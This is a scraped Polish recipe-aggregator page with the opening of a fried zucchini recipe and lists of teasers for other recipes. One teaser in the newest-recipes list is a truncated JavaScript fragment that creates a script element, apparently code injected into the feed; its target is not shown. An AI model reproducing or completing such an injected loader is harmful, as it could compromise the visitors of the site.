Cukinia na najprostszy sposób - smażona
Źródło: http://jemy-jedziemy.blogspot.com/2012/09/cukinia-na-najprostszy-sposob-smazona.html
Dzis szybka i smaczna przekaska. Poki cukinia jest jeszcze za przyslowiowe grosze mozemy eksperymentowac ze smakami. Do przygotowania tego dania wykorzystalam:1 cukinie sredniej wielkosciPanierka to: 2 jajka, pieprz, sol, oregano, czosnek, troche mleka (aby panierka nie byla ciezka)Zamiast bulki tartej uzylam kupionej w sklepiej z orientalna zywnoscia panierki do chrupiacego kurczaka.Cukinie...
Najnowsze przepisy
Druga nieco inna propozycja fit makowca, którego robi się... ⇖ 7
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 21
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 13
Przepisy z bloga
Nie taki straszny jakby sie wydawalo... Zakwas kupilam na... ⇖ 551
Jest taki tort ktory jadlam kilka razy w zyciu i ktory... ⇖ 1464
Powole sobie na cofanie sie do roznych archiwow. Jednym z... ⇖ 613
Kilka dni temu pediatra powiedziala nam, ze Bruno powinien... ⇖ 668
Czailam sie bardzo dlugo na kasze jaglana. Przy kazdej... ⇖ 704
Muffiny z czekolada MilkaI od razu sprostowanie :) nie... ⇖ 4116
Uwielbiam latem spacerowac po targu, we Wloszech uwielbiam... ⇖ 743
Przepis banalny ;)Idziemy na zakupy do Auchan i kupujemy... ⇖ 711
Przepis jeszcze ze szkoly sredniej, czyli sprzed roku 1997... ⇖ 1023
Nototenia marmurkowa to RYBKA choc nazwa wskazuje na cos... ⇖ 1099
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1824
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1197
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 716
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 698
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 491
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 488
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 470









































